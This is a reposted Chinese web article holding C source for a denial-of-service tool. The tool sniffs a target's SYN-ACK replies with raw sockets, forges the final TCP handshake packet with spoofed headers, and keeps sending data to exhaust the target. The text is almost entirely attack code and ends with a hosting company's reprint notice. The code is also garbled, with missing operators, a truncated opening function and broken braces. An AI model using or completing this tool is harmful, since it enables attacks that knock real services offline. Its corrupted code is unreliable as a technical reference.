新型D.o.S(伪造TCP连接进行数据传输的D.o.S)

DWORD dwIP=0;
int i=0;
struct hostent* lp = NULL;
char HostName[255] = {0};
gethostname(HostName,255);
lp = gethostbyname (HostName);
while ( lp->h_addr_list[i] != NULL )
i ;
dwIP = *(DWORD*)lp->h_addr_list[--i];
return dwIP;
}

USHORT checksum(USHORT *buffer, int size)
{
unsigned long cksum=0;
while(size >1)
{
cksum =*buffer ;
size -=sizeof(USHORT);
}
if(size)
{
cksum = *(UCHAR*)buffer;
}
cksum = (cksum >> 16) (cksum & 0xffff);
cksum = (cksum >>16);
return (USHORT)(~cksum);
} DWORD WINAPI ListeningFunc(LPVOID lpvoid)
{
SOCKET rawsock;
SOCKADDR_IN addr_in={0};
if ((rawsock=socket(AF_INET,SOCK_RAW,IPPROTO_IP))==INVALID_SOCKET)
{
printf("Sniffer Socket Setup Error!/n");
return false;
}
addr_in.sin_family=AF_INET;
addr_in.sin_port=htons(8288);
addr_in.sin_addr.S_un.S_addr= (DWORD)lpvoid;
//对rawsock绑定本机IP和端口
int ret=bind(rawsock, (struct sockaddr *)&addr_in, sizeof(addr_in));
if(ret==SOCKET_ERROR)
{
printf("bind false/n");
exit(0);
}
DWORD lpvBuffer = 1;
DWORD lpcbBytesReturned = 0;
WSAIoctl(rawsock, SIO_RCVALL, &lpvBuffer, sizeof(lpvBuffer), NULL, 0, &lpcbBytesReturned, NULL, NULL);
while (TRUE)
{
SOCKADDR_IN from={0};
int size=sizeof(from);
char RecvBuf[256]={0};
//接收数据包
ret=recvfrom(rawsock,RecvBuf,sizeof(RecvBuf),0,(struct sockaddr*)&from,&size);
if(ret!=SOCKET_ERROR)
{
// 分析数据包
IPHEADER *lpIPheader;
lpIPheader=(IPHEADER *)RecvBuf;
if (lpIPheader->proto==IPPROTO_TCP && lpIPheader->sourceIP == inet_addr(ATTACKIP) )
{

TCPHEADER *lpTCPheader=(TCPHEADER*)(RecvBuf sizeof(IPHEADER));
//判断是不是远程开放端口返回的数据包
if ( lpTCPheader->th_flag==0x12)
{
if ( lpTCPheader->th_ack == htonl(0x00198289) )
{//伪造第3次握手
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq) 1), /
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,NULL,FALSE,0);
//主动发出一次数据
SendData(lpTCPheader->th_ack,htonl(ntohl(lpTCPheader->th_seq) 1), /
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
}

}
else
{
if ( lpTCPheader->th_flag == 0x10 )
//继续发送数据
SendData(lpTCPheader->th_ack,lpTCPheader->th_seq,/
lpTCPheader->th_dport,lpTCPheader->th_sport,lpIPheader->destIP,lpIPheader->sourceIP,psend,TRUE,len);
} }

}
} // end while } void SendData(DWORD SEQ, DWORD ACK, USHORT SPort, USHORT APort, DWORD SIP, DWORD AIP, char* pBuf, BOOL Isdata,DWORD dwSize)
{

SOCKADDR_IN addr_in;
IPHEADER ipHeader;
TCPHEADER tcpHeader;
PSDHEADER psdHeader; char szSendBuf[1024]={0};
addr_in.sin_family=AF_INET;
addr_in.sin_port = APort;
addr_in.sin_addr.S_un.S_addr = AIP;
ipHeader.h_verlen=(4<<4 | sizeof(ipHeader)/sizeof(unsigned long));
ipHeader.tos=0; ipHeader.ident=1;
ipHeader.frag_and_flags=0x0040;
ipHeader.ttl=0x80;
ipHeader.proto=IPPROTO_TCP;
ipHeader.checksum=0;
ipHeader.destIP=AIP;
ipHeader.sourceIP = SIP;
tcpHeader.th_dport = APort;
tcpHeader.th_ack = ACK;
tcpHeader.th_lenres=(sizeof(tcpHeader)/4<<4|0);
tcpHeader.th_seq= SEQ;
tcpHeader.th_win=htons(0x4470);
tcpHeader.th_sport=SPort;
ipHeader.total_len=htons(sizeof(ipHeader) sizeof(tcpHeader) dwSize);
if ( !Isdata)
{ tcpHeader.th_flag=0x10;

}// ack
else
{
tcpHeader.th_flag=0x18;
}
tcpHeader.th_urp=0;
psdHeader.daddr=ipHeader.destIP;
psdHeader.mbz=0;
psdHeader.ptcl=IPPROTO_TCP;
psdHeader.tcpl=htons(sizeof(tcpHeader));
tcpHeader.th_sum=0;
psdHeader.saddr=ipHeader.sourceIP;
memcpy(szSendBuf, &psdHeader, sizeof(psdHeader));
memcpy(szSendBuf sizeof(psdHeader), &tcpHeader, sizeof(tcpHeader));
if ( pBuf != NULL )
{
memcpy(szSendBuf sizeof(psdHeader) sizeof(tcpHeader),pBuf,dwSize);
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader) sizeof(tcpHeader) dwSize);
tcpHeader.th_sum = htons(ntohs(tcpHeader.th_sum)-(USHORT)dwSize);
}
else
{
tcpHeader.th_sum=checksum((USHORT *)szSendBuf,sizeof(psdHeader) sizeof(tcpHeader));
} memcpy(szSendBuf, &ipHeader, sizeof(ipHeader));
memcpy(szSendBuf sizeof(ipHeader), &tcpHeader, sizeof(tcpHeader));
int rect=0;
if ( pBuf == NULL )
rect=sendto(sock, szSendBuf, sizeof(ipHeader) sizeof(tcpHeader), 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
else
{
memcpy(szSendBuf sizeof(ipHeader) sizeof(tcpHeader), pBuf, dwSize);
rect=sendto(sock, szSendBuf, sizeof(ipHeader) sizeof(tcpHeader) dwSize, 0, (struct sockaddr*)&addr_in, sizeof(addr_in));
} if (rect==SOCKET_ERROR)
{
printf("send error!:%x/n",WSAGetLastError());
return;
}
else
{
if ( pBuf != NULL )
printf("SendData ok %d/n",ntohs(SPort));
else
printf(" SendAck ok %d/n",ntohs(SPort));

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!